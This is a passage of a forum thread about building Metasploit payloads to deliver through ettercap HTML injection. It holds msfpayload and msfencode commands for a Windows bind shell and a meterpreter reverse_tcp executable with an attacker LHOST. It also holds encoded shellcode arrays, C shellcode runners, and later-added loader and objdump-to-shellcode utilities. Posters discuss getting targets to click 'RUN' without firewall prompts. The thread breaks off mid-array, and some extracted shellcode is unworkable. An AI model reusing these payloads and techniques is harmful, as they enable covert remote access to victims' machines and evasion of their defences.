Page 2 of 2 (posts 11 to 19 of 19)

Thread: ettercap filter html injection meterpeter.exe

#11 BigMac (Senior Member, joined Jan 2008, 213 posts)

I found this http://www.okc2600.com/viewtopic.php?p=4062

./msfpayload windows/shell_bind_tcp LPORT=30000 R | ./msfencode -e x86/shikata_ga_nai -t c > ~/binder.c
    Code:
    unsigned char buf[] = 
    "\xba\x40\x5f\x2d\x18\xd9\xd0\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
    "\x46\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\xb5\xa3\xc5\x4e"
    "\x35\x5c\x16\x3c\x60\x0a\x41\x49\xe6\x96\x75\xc6\xb3\xea\x0e"
    "\x8c\x3e\x6b\x10\xc7\xcb\xc1\x0a\x9c\x91\xf5\x2b\x49\xc6\xc4"
    "\x62\x06\x3c\xa2\x74\xf6\x0d\x4b\x8a\x37\xad\x1f\x4b\xd8\x59"
    "\x67\x6d\xd7\xac\x66\xaa\x03\x5c\x53\x48\xf0\xb4\xd1\x51\x73"
    "\xee\x3d\x93\x6f\x68\xb5\x9f\x24\xff\x93\x83\xbb\x14\xa8\xb8"
    "\x30\xeb\x47\x2b\x44\xda\x57\xf3\x17\x41\x03\xce\xa0\x79\xed"
    "\xa4\x80\x20\x75\xb2\xf8\x59\x2e\xc8\x71\x06\xcd\x5b\x9e\x33"
    "\xb6\x53\xf2\x2b\xc7\x2a\xfa\x47\x28\x64\x8b\x50\x84\xe1\xd8"
    "\x94\x84\x63\x1f\xfe\x5a\x6f\xe0\xff\x5c\x70\xb1\xa8\x0a\x23"
    "\xb8\xb3\x5b\xdc\xba\x3b\x9c\x73\xbb\x3b\x9c\xc5\xa5\x23\x7b"
    "\x8d\xcf\x23\x6a\x22\x16\x69\x0c\x62\xe0\x98\x60\x5f\x1e\x9e"
    "\x40\x37\xb2\x6c\xe8\x84\x06\x90\x4d\x66\x2d\x88\x20\x87\x65"
    "\x21\x1d\xfe\x49\xbc\xd7\x15\x24\xbb\x4e\x47\xeb\x3c\x44\xe8"
    "\xf4\x97\xa1\xaf\x83\x13\x24\xad\x66\x30\x1f\x66\x78\x71\xa0"
    "\xd3\xae\x4c\x9e\x8c\xfe\xfe\x4e\x6d\xaf\xbe\x3e\x92\x1a\x1a"
    "\x36\xab\xcd\xa2\xe0\x35\x08\x4a\xf3\x35\x14\xee\x7a\xd4\x7e"
    "\xfe\x2d\x40\x80\xab\xed\x04\x3e\x0d\xb8\x19\x58\xb7\x12\x5b"
    "\x43\xbf\xcc\x31\x8c\x40\xa5\xc9\x05\x7d\x2c\xd2\x43\xd2\xe6"
    "\x2d\x3e\xcc\xf7\x01\xcb";
I took the code above and came up with this
    Code:
#include <stdio.h>

/* windows/shell_bind_tcp LPORT=30000, x86/shikata_ga_nai encoded
   (the msfpayload/msfencode output above, pasted in as a byte array) */
char payload[] = 
"\xba\x40\x5f\x2d\x18\xd9\xd0\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x46\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\xb5\xa3\xc5\x4e"
"\x35\x5c\x16\x3c\x60\x0a\x41\x49\xe6\x96\x75\xc6\xb3\xea\x0e"
"\x8c\x3e\x6b\x10\xc7\xcb\xc1\x0a\x9c\x91\xf5\x2b\x49\xc6\xc4"
"\x62\x06\x3c\xa2\x74\xf6\x0d\x4b\x8a\x37\xad\x1f\x4b\xd8\x59"
"\x67\x6d\xd7\xac\x66\xaa\x03\x5c\x53\x48\xf0\xb4\xd1\x51\x73"
"\xee\x3d\x93\x6f\x68\xb5\x9f\x24\xff\x93\x83\xbb\x14\xa8\xb8"
"\x30\xeb\x47\x2b\x44\xda\x57\xf3\x17\x41\x03\xce\xa0\x79\xed"
"\xa4\x80\x20\x75\xb2\xf8\x59\x2e\xc8\x71\x06\xcd\x5b\x9e\x33"
"\xb6\x53\xf2\x2b\xc7\x2a\xfa\x47\x28\x64\x8b\x50\x84\xe1\xd8"
"\x94\x84\x63\x1f\xfe\x5a\x6f\xe0\xff\x5c\x70\xb1\xa8\x0a\x23"
"\xb8\xb3\x5b\xdc\xba\x3b\x9c\x73\xbb\x3b\x9c\xc5\xa5\x23\x7b"
"\x8d\xcf\x23\x6a\x22\x16\x69\x0c\x62\xe0\x98\x60\x5f\x1e\x9e"
"\x40\x37\xb2\x6c\xe8\x84\x06\x90\x4d\x66\x2d\x88\x20\x87\x65"
"\x21\x1d\xfe\x49\xbc\xd7\x15\x24\xbb\x4e\x47\xeb\x3c\x44\xe8"
"\xf4\x97\xa1\xaf\x83\x13\x24\xad\x66\x30\x1f\x66\x78\x71\xa0"
"\xd3\xae\x4c\x9e\x8c\xfe\xfe\x4e\x6d\xaf\xbe\x3e\x92\x1a\x1a"
"\x36\xab\xcd\xa2\xe0\x35\x08\x4a\xf3\x35\x14\xee\x7a\xd4\x7e"
"\xfe\x2d\x40\x80\xab\xed\x04\x3e\x0d\xb8\x19\x58\xb7\x12\x5b"
"\x43\xbf\xcc\x31\x8c\x40\xa5\xc9\x05\x7d\x2c\xd2\x43\xd2\xe6"
"\x2d\x3e\xcc\xf7\x01\xcb";

int main(int argc, char **argv) {
	/* cast the byte array to a function pointer and jump into it.
	   These are Windows bytes, so this does something only when built
	   and run on Windows, and the page holding payload has to be
	   executable for the jump to work at all. */
	(*(void (*)()) payload)();
	return 0;
}
I tried to compile this with gcc meterpreter.c -o meterpreter.exe
But I'm sure it's clear that I don't know what I'm doing with this source lol

#12 BigMac (Senior Member, joined Jan 2008, 213 posts)

    I GOT IT WOOT

    http://markremark.blogspot.com/2008/...e-and-exe.html
and it looks like you can double encode it or something like that

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=100 R | ./msfencode -t exe > meta.exe

#13 Just burned his ISO (joined Nov 2008, 14 posts)

Awesome, I was thinking that the payload may be getting some bad chars when it gets run through twice, but I see he has fixed this, or so it seems. I am about to go home for an early Thanksgiving but I'll take my laptop and work with the meterpreter/http ... all others set off the firewall IDS on Vista. But again, since the port is used it doesn't work. The XP OS I have just runs it, the firewall never asks for permission. I'll see what I come up with. I'm going to take one of the auto_pwn servers as a base and use that as the connection point, so that port 80 is free to connect back for a shell. This way when the target clicks "RUN" it will do just that, instead of the IDS saying "do you want to open the firewall for this app?". I will let you know.
Again, awesome find.

    --EDIT--
btw, my initial thought is that the double encode is putting a \x00 or another null byte of some kind in either during the encode, or the target CPU is goofing the shellcode somewhere. My laptop is packed up for the trip at the moment but if I remember correctly, the initial single encode came back with (+-)300 chars of payload, ... and the original double encode gave (+)700-800 chars, a lot of room for a null byte, or misinterpretation by the target machine.

    --EDIT EDIT--
also gcc can't do that, as far as it's concerned you have a misc. piece of info with no instructions on what to do with it. You would need to finish the code. The piece you're looking at now is declaring that unsigned buf[] = "shellcode" but you would need to finish it with an

init main()
run unsigned buf[]

bad example of pseudo code I know.
but it would be the same as if I told you that "the book you want is at the Library!"
...but if I don't give you directions to the building, that doesn't do you any good.

#14 Just burned his ISO (joined Nov 2008, 14 posts)

I hope this answers your question.

Hey BigMac
alright I'm going to try to do something of a tutorial on getting 'code' from the windows-binaries folder.
First thing I'm going to do is go into what's going on with msfpayload, how to use the output... and then we'll get into all that.

My initial thought was that it could be done, however ... to mush together the hex with user input would require more C than I'm willing to go into on this particular tutorial. That said, here we go...
alright the first thing is programming, if you want to take this further I would suggest learning a little bit of C and assembly. I'm going to refer back to your post where you used an msfpayload option for a tcp shell and it gave you the output:
    unsigned char buf[] =
"\xba\x40\x5f\x2d\x18\xd9\xd0\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x46\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\xb5\xa3\xc5\x4e"
"\x35\x5c\x16\x3c\x60\x0a\x41\x49\xe6\x96\x75\xc6\xb3\xea\x0e"
"\x8c\x3e\x6b\x10\xc7\xcb\xc1\x0a\x9c\x91\xf5\x2b\x49\xc6\xc4"
"\x62\x06\x3c\xa2\x74\xf6\x0d\x4b\x8a\x37\xad\x1f\x4b\xd8\x59"
"\x67\x6d\xd7\xac\x66\xaa\x03\x5c\x53\x48\xf0\xb4\xd1\x51\x73"
"\xee\x3d\x93\x6f\x68\xb5\x9f\x24\xff\x93\x83\xbb\x14\xa8\xb8"
"\x30\xeb\x47\x2b\x44\xda\x57\xf3\x17\x41\x03\xce\xa0\x79\xed"
"\xa4\x80\x20\x75\xb2\xf8\x59\x2e\xc8\x71\x06\xcd\x5b\x9e\x33"
"\xb6\x53\xf2\x2b\xc7\x2a\xfa\x47\x28\x64\x8b\x50\x84\xe1\xd8"
"\x94\x84\x63\x1f\xfe\x5a\x6f\xe0\xff\x5c\x70\xb1\xa8\x0a\x23"
"\xb8\xb3\x5b\xdc\xba\x3b\x9c\x73\xbb\x3b\x9c\xc5\xa5\x23\x7b"
"\x8d\xcf\x23\x6a\x22\x16\x69\x0c\x62\xe0\x98\x60\x5f\x1e\x9e"
"\x40\x37\xb2\x6c\xe8\x84\x06\x90\x4d\x66\x2d\x88\x20\x87\x65"
"\x21\x1d\xfe\x49\xbc\xd7\x15\x24\xbb\x4e\x47\xeb\x3c\x44\xe8"
"\xf4\x97\xa1\xaf\x83\x13\x24\xad\x66\x30\x1f\x66\x78\x71\xa0"
"\xd3\xae\x4c\x9e\x8c\xfe\xfe\x4e\x6d\xaf\xbe\x3e\x92\x1a\x1a"
"\x36\xab\xcd\xa2\xe0\x35\x08\x4a\xf3\x35\x14\xee\x7a\xd4\x7e"
"\xfe\x2d\x40\x80\xab\xed\x04\x3e\x0d\xb8\x19\x58\xb7\x12\x5b"
"\x43\xbf\xcc\x31\x8c\x40\xa5\xc9\x05\x7d\x2c\xd2\x43\xd2\xe6"
"\x2d\x3e\xcc\xf7\x01\xcb";

Alright, that's nice looking but we have to do something with it. Or at least tell the computer to.

let's start with some smaller/simpler code.
so I'm gonna open a shell, cd over to framework3, and use ...

    # ./msfpayload linux/x86/exec CMD="ls -la" C
    should return ...

    /*
    * linux/x86/exec - 42 bytes
* it won't let me put the link
    * AppendExit=false, CMD=ls -la, PrependSetresuid=false,
    * PrependSetuid=false, PrependSetreuid=false
    */
    unsigned char buf[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\x00\x00\x6c"
"\x73\x20\x2d\x6c\x61\x00\x57\x53\x89\xe1\xcd\x80";

alright let's do something with this...
    make a text file and name it "first.c"

    insert this into it.


/* linux/x86/exec CMD="ls -la", the 42 bytes msfpayload printed above */
char shellcode[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\x00\x00\x6c"
"\x73\x20\x2d\x6c\x61\x00\x57\x53\x89\xe1\xcd\x80";

int main(int argc, char **argv) {
	/* treat the byte array as a function and call it; the array lives in
	   .data, so that page has to be executable for the call to work on a
	   kernel that enforces NX */
	int (*func)();
	func = (int (*)()) shellcode;
	func();
	return 0;
}
Alright now compile it with...
# gcc -o first first.c
then run
# ./first
(or you could just use "first" .... it's executable)

should give you a list equal to ls -la.

Alright that should give you a good indication of what to do with the code given by msfpayload.
You should be able to make your own mini C programs with the given example. (and for others, yes there are other ways to do it, such as defining a pointer to it, but again, off the top of my head, that's what you get)

Now then, for the main part and to answer your question... you didn't really specify which program you wanted to do this with... encoding the ALREADY compiled data, in my mind, can be done. However, I see a problem. If the program accepts user input... there really isn't any way for it to collect said data (actually I would think that given an argv[1] or similar when run in the C code should do it... but I'm not getting into that right now)
anyway... here we go.
And keep in mind I'm doing a trial run of everything as I type this.

Well I think I'm going to use an example for this that is short and to the point.
I think you will understand why at the end of this tut.
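An added example that does the same job as first.c above, written for this edit and not code from the post or from Metasploit: it takes the text that msfpayload prints with the C option, turns the \xHH escapes back into bytes, counts NUL bytes, and copies the result into an anonymous read-write-execute mapping before calling it, so it does not depend on .data being executable. The embedded sample is the linux/x86/exec output quoted above, typed in as constructed text; the optional file argument, the 4 KiB payload limit and the RWX mmap are my choices, not something the post describes.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <sys/mman.h>

/* Constructed sample input: the linux/x86/exec CMD="ls -la" output quoted
 * above, exactly as msfpayload prints it (backslashes doubled here so the
 * compiler keeps them as text instead of interpreting them). */
static const char SAMPLE_SHELLCODE_TEXT[] =
    "unsigned char buf[] =\n"
    "\"\\x6a\\x0b\\x58\\x99\\x52\\x66\\x68\\x2d\\x63\\x89\\xe7\\x68\\x2f\\x73\\x68\"\n"
    "\"\\x00\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\xe8\\x07\\x00\\x00\\x00\\x6c\"\n"
    "\"\\x73\\x20\\x2d\\x6c\\x61\\x00\\x57\\x53\\x89\\xe1\\xcd\\x80\";\n";

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* Turn every \xHH escape in text into one byte of out.  Quotes, semicolons,
 * newlines and the "unsigned char buf[] =" prefix are skipped, so the
 * msfpayload C output can be fed in unchanged; a stray space after the
 * backslash (what forum line-wrapping produces) is tolerated.  Returns the
 * byte count, or 0 when out is too small. */
size_t unescape_c_string(const char *text, unsigned char *out, size_t cap)
{
    size_t n = 0;
    for (const char *p = text; *p; p++) {
        if (*p != '\\') continue;
        const char *q = p + 1;
        while (isspace((unsigned char)*q)) q++;
        if (*q != 'x') continue;
        int hi = hexval((unsigned char)q[1]);
        int lo = hi < 0 ? -1 : hexval((unsigned char)q[2]);
        if (lo < 0) continue;
        if (n == cap) return 0;
        out[n++] = (unsigned char)(hi << 4 | lo);
        p = q + 2;
    }
    return n;
}

/* NUL bytes do not bother this loader, but they end any copy that goes
 * through a C string function on the target, which is why encoders avoid them. */
size_t count_nulls(const unsigned char *code, size_t len)
{
    size_t nulls = 0;
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0) nulls++;
    return nulls;
}

/* Copy code into a fresh anonymous mapping that is readable, writable and
 * executable, so it runs whether or not .data is executable.  Returns NULL
 * if the kernel refuses RWX memory. */
unsigned char *load_executable(const unsigned char *code, size_t len)
{
    void *page = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) return NULL;
    memcpy(page, code, len);
    return page;
}

/* ./loader          runs the embedded sample
 * ./loader sc.txt   runs the shellcode found in a saved msfpayload C output
 * The sample is 32-bit x86, so build with gcc -m32 on an x86-64 box. */
int main(int argc, char **argv)
{
    static char text[1 << 16];
    unsigned char code[4096];
    size_t len;

    if (argc > 1) {
        FILE *f = fopen(argv[1], "rb");
        if (!f) { perror(argv[1]); return 1; }
        size_t got = fread(text, 1, sizeof text - 1, f);
        fclose(f);
        text[got] = '\0';
        len = unescape_c_string(text, code, sizeof code);
    } else {
        len = unescape_c_string(SAMPLE_SHELLCODE_TEXT, code, sizeof code);
    }
    if (len == 0) { fputs("no \\xHH escapes found\n", stderr); return 1; }
    printf("%zu bytes, %zu NUL\n", len, count_nulls(code, len));

    unsigned char *page = load_executable(code, len);
    if (!page) { perror("mmap"); return 1; }
    ((void (*)(void))page)();   /* returns only if the shellcode does */
    return 0;
}
```

The same parser is what you need before msfencode -i as well: msfencode reads raw bytes from the input file, not the \x text, so the escapes have to be turned back into bytes first.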

#15 Just burned his ISO (joined Nov 2008, 14 posts)

part 2

Alright let's get into something with some MEAT to it already.
Go back to your msfpayload and type this...
**NOTE: the double lines in the dir address... it will not read otherwise ... and I forget why off the top of my head at the moment.... bash something or other (don't hate me cuz I have alzheimer's)

# ./msfpayload windows/exec EXITFUNC=seh CMD=C:\\WINDOWS\\System32\\calc.exe C
this should give you this.

    /*
    * windows/exec - 141 bytes
    * again no links
    * EXITFUNC=seh, CMD=C:\WINDOWS\System32\calc.exe
    */
    unsigned char buf[] =
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef"
"\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31"
"\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b"
"\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b"
"\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x5f"
"\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b\x40\x0c\x8b\x70\x1c\xad"
"\x8b\x68\x08\x89\xf8\x83\xc0\x6a\x50\x68\xf0\x8a\x04\x5f\x68"
"\x98\xfe\x8a\x0e\x57\xff\xe7\x43\x3a\x5c\x57\x49\x4e\x44\x4f"
"\x57\x53\x5c\x53\x79\x73\x74\x65\x6d\x33\x32\x5c\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";
Alright, now there's your shellcode to start calc.exe for a Windows computer.
* You may want to put it into the C program above and run it to check, .. I have already done this, and it works. But just in case, feel free.

Once again with msfpayload, I'm going to make this an executable and name it myfile.exe and I'm going to funnel it all into the root window.

# ./msfpayload windows/exec EXITFUNC=seh CMD=C:\\WINDOWS\\System32\\calc.exe X > /root/myfile.exe
Ok so now we have an EXE file in our home/root directory.
now type...
# cd
# ls
you should see your file (myfile.exe), or just a visual check will do, I put it there for ease of usage and movement.
* I'm moving these files with a USB drive from computer to computer (**checking them on Vista and XP SP3)


At this time if you would like to, again, move it over to Windows and try it.
It should work and start the calculator program.

    Back at the shell type this:
    # objdump -d myfile.exe
    Your output should look something like this ....
#######################################################
    myfile.exe: file format efi-app-ia32

    Disassembly of section .text:

    0000000000401000 <.text>:
    401000: 31 c0 xor %eax,%eax
    401002: 68 34 10 40 00 push $0x401034
401007: 64 ff 30 pushl %fs:(%eax)
40100a: 64 89 20 mov %esp,%fs:(%eax)
    40100d: 6a 40 push $0x40
    40100f: 68 00 30 00 00 push $0x3000
    401014: 68 00 00 10 00 push $0x100000
    401019: 6a 00 push $0x0
    40101b: e8 24 00 00 00 call 0x401044
    401020: 89 c5 mov %eax,%ebp
    401022: 89 c7 mov %eax,%edi
    401024: be 00 20 40 00 mov $0x402000,%esi
    401029: b9 00 08 00 00 mov $0x800,%ecx
40102e: f3 a5 rep movsl %ds:(%esi),%es:(%edi)
    401030: ff d5 call *%ebp
    401032: 90 nop
    401033: 90 nop
    401034: ff 25 3c 40 40 00 jmp *0x40403c
    40103a: 90 nop
    40103b: 90 nop
    ...
    401044: ff 25 40 40 40 00 jmp *0x404040
    40104a: 90 nop
    40104b: 90 nop
    ...
    401054: ff (bad)
    401055: ff (bad)
    401056: ff (bad)
    401057: ff 00 incl (%eax)
    401059: 00 00 add %al,(%eax)
    40105b: 00 ff add %bh,%bh
    40105d: ff (bad)
    40105e: ff (bad)
    40105f: ff 00 incl (%eax)
    401061: 00 00 add %al,(%eax)
    ...
##########################################################
let's take a look at this from the top.
    Going left to right
    We have file format and type
    The section it is disassembling
    and the start of memory number and again <section> of disassembly
    (lemme bring it down)
###########################################################
myfile.exe: file format efi-app-ia32

Disassembly of section .text:

0000000000401000 <.text>:
401000: 31 c0 xor %eax,%eax
401002: 68 34 10 40 00 push $0x401034
401007: 64 ff 30 pushl %fs:(%eax)
40100a: 64 89 20 mov %esp,%fs:(%eax)
############################################################
1 2 3
ok at point 1 we have memory addresses
point 2 we have hex
and point 3 is the assembly

Take a look at point 2

31 c0
68 34 10 40 00
does this look familiar??
What if I wrote it like this ..

\x31\xc0
\x68\x34\x10\x40\x00
BINGO, if you'll take all the hex code and revamp it into \x** format, you now have your shellcode for the program.
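The hand conversion just described (the hex column of objdump -d rewritten as \xHH escapes) as an added example, written for this edit and not code from the post: it reads an objdump listing, keeps the opcode bytes of each instruction line, skips the file header, the "..." lines and anything after the mnemonic (including the "(bad)" tail), and prints the result as a C string. The embedded sample is the first four instruction lines of the listing above, typed in as constructed input with the garbled %fs:(%eax) operands repaired. One caveat the listing itself shows: instructions such as push $0x401034 and jmp *0x40403c carry absolute addresses, so bytes lifted from a linked .exe only make sense at the address the image was linked for.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Constructed sample: the header and first four instruction lines of the
 * objdump -d myfile.exe listing quoted above, in objdump's tab layout. */
static const char SAMPLE_LISTING[] =
    "myfile.exe:     file format efi-app-ia32\n"
    "\n"
    "Disassembly of section .text:\n"
    "\n"
    "0000000000401000 <.text>:\n"
    "  401000:\t31 c0                \txor    %eax,%eax\n"
    "  401002:\t68 34 10 40 00       \tpush   $0x401034\n"
    "  401007:\t64 ff 30             \tpushl  %fs:(%eax)\n"
    "  40100a:\t64 89 20             \tmov    %esp,%fs:(%eax)\n"
    "  ...\n";

/* Exactly two hex digits followed by a separator: an opcode byte rather
 * than the start of a mnemonic such as "add" or "dec". */
static int ishex2(const char *s)
{
    return isxdigit((unsigned char)s[0]) && isxdigit((unsigned char)s[1])
        && !isalnum((unsigned char)s[2]);
}

/* Append the opcode bytes of one listing line to out as \xHH escapes.
 * Lines without an "ADDR:" prefix (headers, blanks, "...") yield nothing.
 * Returns the number of bytes taken from the line. */
static size_t convert_line(const char *line, size_t linelen,
                           char *out, size_t cap, size_t *pos)
{
    const char *colon = memchr(line, ':', linelen);
    if (!colon) return 0;
    for (const char *a = line; a < colon; a++)       /* must be a hex address */
        if (!isspace((unsigned char)*a) && !isxdigit((unsigned char)*a)) return 0;

    const char *p = colon + 1, *end = line + linelen;
    size_t taken = 0;
    while (p < end) {
        while (p < end && isspace((unsigned char)*p)) p++;
        if (p + 2 > end || !ishex2(p)) break;          /* mnemonic reached */
        if (*pos + 4 >= cap) break;                    /* keep room for NUL */
        *pos += snprintf(out + *pos, cap - *pos, "\\x%c%c",
                         tolower((unsigned char)p[0]), tolower((unsigned char)p[1]));
        taken++;
        p += 2;
    }
    return taken;
}

/* Convert a whole listing; out receives the escapes as a NUL-terminated
 * string and the return value is the number of bytes it encodes. */
size_t objdump_to_escaped(const char *listing, char *out, size_t cap)
{
    size_t pos = 0, total = 0;
    const char *line = listing;
    while (*line) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        total += convert_line(line, len, out, cap, &pos);
        line = nl ? nl + 1 : line + len;
    }
    out[pos] = '\0';
    return total;
}

/* ./objdump2sc                 converts the embedded sample
 * ./objdump2sc listing.txt     converts a saved "objdump -d myfile.exe" */
int main(int argc, char **argv)
{
    static char text[1 << 16];
    static char escaped[1 << 18];

    if (argc > 1) {
        FILE *f = fopen(argv[1], "rb");
        if (!f) { perror(argv[1]); return 1; }
        size_t got = fread(text, 1, sizeof text - 1, f);
        fclose(f);
        text[got] = '\0';
    } else {
        strcpy(text, SAMPLE_LISTING);
    }
    size_t n = objdump_to_escaped(text, escaped, sizeof escaped);
    printf("/* %zu bytes */\nchar shellcode[] =\n\"%s\";\n", n, escaped);
    return 0;
}
```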

#16 Just burned his ISO (joined Nov 2008, 14 posts)

part 3

So I'm going to do just that...

/* the .text bytes of myfile.exe, copied from the objdump listing above */
char shellcode[] =
"\x31\xc0\x68\x34\x10\x40\x00\x64\xff\x30\x64\x89\x20\x6a\x40\x68\x00\x30\x00"
"\x00\x68\x00\x00\x10\x00\x6a\x00\xe8\x24\x00\x00\x00\x89\xc5\x89\xc7\xbe\x00"
"\x20\x40\x00\xb9\x00\x08\x00\x00\xf3\xa5\xff\xd5\x90\x90\xff\x25\x3c\x40\x40"
"\x00\x90\x90\xff\x25\x40\x40\x40\x00\x90\x90\xff\xff\xff\xff\x00\x00\x00\x00"
"\xff\xff\xff\xff\x00\x00\x00";

int main(int argc, char **argv) {
	int (*func)();
	func = (int (*)()) shellcode;
	func();
	return 0;
}
Now compile that again as
# gcc -o myfile myfile.c
Take that and run it on a Windows box .... opens calc.exe
Alright, now for the encoding.
take just the shellcode aka,
"\x31\xc0\x68\x34\x10\x40\x00\x64\xff\x30\x64\x89\x20\x6a\x40\x68\x00\x30\x00"
"\x00\x68\x00\x00\x10\x00\x6a\x00\xe8\x24\x00\x00\x00\x89\xc5\x89\xc7\xbe\x00"
"\x20\x40\x00\xb9\x00\x08\x00\x00\xf3\xa5\xff\xd5\x90\x90\xff\x25\x3c\x40\x40"
"\x00\x90\x90\xff\x25\x40\x40\x40\x00\x90\x90\xff\xff\xff\xff\x00\x00\x00\x00"
"\xff\xff\xff\xff\x00\x00\x00";
and copy that into a text file and run it through the encoder.

    # ./msfencode -i shell.txt -t c
This should output something like ...

    [*] x86/shikata_ga_nai succeeded, final size 374

    unsigned char buf[] =
"\xdb\xd3\xd9\x74\x24\xf4\x29\xc9\xbb\x3e\x80\xd0\xc5\x5a\xb1"
"\x57\x31\x5a\x1a\x03\x5a\x1a\x83\xea\xfc\xe2\xcb\xa2\x8c\xbd"
"\x00\x92\x70\x46\x05\xe4\xd4\xce\xff\x3c\xb9\x56\xcc\x08\x1d"
"\xdf\x03\x41\xc1\x67\x57\x91\xa5\xef\xa7\xe1\x09\x68\xf1\x35"
"\xee\xf0\x9b\x53\x52\x79\x50\xac\x36\x01\xa0\xf8\x9a\x89\xf4"
"\x39\x7f\x12\x36\x0a\x23\x9a\x00\x0b\x87\x22\x58\xfb\x6b\xab"
"\x96\xc3\xcf\x33\xe6\x03\xac\xbb\x35\x54\x10\x44\x09\xa4\x8a"
"\xbe\x4b\x98\xb2\x8e\xbb\x7c\x3b\xd9\x83\x20\xc3\x15\xc3\x84"
"\x4b\x66\x13\x69\xd4\xb7\x63\xcd\x5c\x88\xb3\xb1\xe4\xde\xd2"
"\x15\x6d\x2f\x24\xfa\xf5\x2a\x7c\x5e\x7e\x87\x48\x02\x06\xd7"
"\x80\xe6\x8e\x27\xd0\x4a\x17\x78\x20\x2f\x9f\x40\x79\x93\x27"
"\xd2\x4c\x77\xa0\x2c\x97\xdb\x28\x2e\xd0\xbf\xb0\xd2\x7b\x1c"
"\x39\x23\xb3\xbe\xb3\x61\xef\xc6\xf1\x55\x53\x4f\xc2\xa5\x37"
"\xd7\x1a\xf6\x9b\x5f\x39\xcf\x7f\xd8\x8d\x1f\x23\x60\xde\x67"
"\x87\xe8\x2e\xa8\x6b\x71\x7f\xf8\xcf\xf9\x19\xcb\xb3\x81\x84"
"\x1e\x17\x0a\x21\x07\xfb\x92\xc9\xf2\x5f\x1b\x2b\xcd\x03\xa3"
"\x72\x1d\xe7\x2b\xe3\x3b\x4b\xb4\xd9\xf6\x2f\x3c\x2d\x9a\x93"
"\xc4\x65\x6c\x77\x4d\xb2\xbc\xa5\xa7\x98\xe0\xd1\x87\xec\x44"
"\x59\xd1\x3c\x29\xe1\x18\x0d\x8d\x69\x3d\x0b\x71\xf1\xf3\xe6"
"\xd5\x79\xc0\x38\xba\x01\x1c\x09\x1e\x89\x68\x59\xc2\x11\xa1"
"\xa9\xa6\x99\xf8\xf9\x0a\x21\xc2\xc9\xee\xa9\x52\x4c\x53\x31"
"\xfd\xf6\x37\xb9\x67\x91\x9b\x41\x0e\x3b\x78\xc9\xfe\xf3\xdc"
"\x51\xcf\xc3\x80\xd9\x1f\x14\x65\x61\x50\x64\xb7\x9b\xb2\xd8"
"\xcf\xfd\xd4\xbc\x57\x67\x7f\x61\xd0\x01\x19\xc5\x58\xab\x83"
"\xa9\xe0\x03\x7c\x0e\x69\x53\x4c\xf2\xf1\xa3\x9c\x28\x39";
Alright let's give it a whirl with the C program.

/* the x86/shikata_ga_nai output from msfencode above (374 bytes) */
char shellcode[] =
"\xdb\xd3\xd9\x74\x24\xf4\x29\xc9\xbb\x3e\x80\xd0\xc5\x5a\xb1"
"\x57\x31\x5a\x1a\x03\x5a\x1a\x83\xea\xfc\xe2\xcb\xa2\x8c\xbd"
"\x00\x92\x70\x46\x05\xe4\xd4\xce\xff\x3c\xb9\x56\xcc\x08\x1d"
"\xdf\x03\x41\xc1\x67\x57\x91\xa5\xef\xa7\xe1\x09\x68\xf1\x35"
"\xee\xf0\x9b\x53\x52\x79\x50\xac\x36\x01\xa0\xf8\x9a\x89\xf4"
"\x39\x7f\x12\x36\x0a\x23\x9a\x00\x0b\x87\x22\x58\xfb\x6b\xab"
"\x96\xc3\xcf\x33\xe6\x03\xac\xbb\x35\x54\x10\x44\x09\xa4\x8a"
"\xbe\x4b\x98\xb2\x8e\xbb\x7c\x3b\xd9\x83\x20\xc3\x15\xc3\x84"
"\x4b\x66\x13\x69\xd4\xb7\x63\xcd\x5c\x88\xb3\xb1\xe4\xde\xd2"
"\x15\x6d\x2f\x24\xfa\xf5\x2a\x7c\x5e\x7e\x87\x48\x02\x06\xd7"
"\x80\xe6\x8e\x27\xd0\x4a\x17\x78\x20\x2f\x9f\x40\x79\x93\x27"
"\xd2\x4c\x77\xa0\x2c\x97\xdb\x28\x2e\xd0\xbf\xb0\xd2\x7b\x1c"
"\x39\x23\xb3\xbe\xb3\x61\xef\xc6\xf1\x55\x53\x4f\xc2\xa5\x37"
"\xd7\x1a\xf6\x9b\x5f\x39\xcf\x7f\xd8\x8d\x1f\x23\x60\xde\x67"
"\x87\xe8\x2e\xa8\x6b\x71\x7f\xf8\xcf\xf9\x19\xcb\xb3\x81\x84"
"\x1e\x17\x0a\x21\x07\xfb\x92\xc9\xf2\x5f\x1b\x2b\xcd\x03\xa3"
"\x72\x1d\xe7\x2b\xe3\x3b\x4b\xb4\xd9\xf6\x2f\x3c\x2d\x9a\x93"
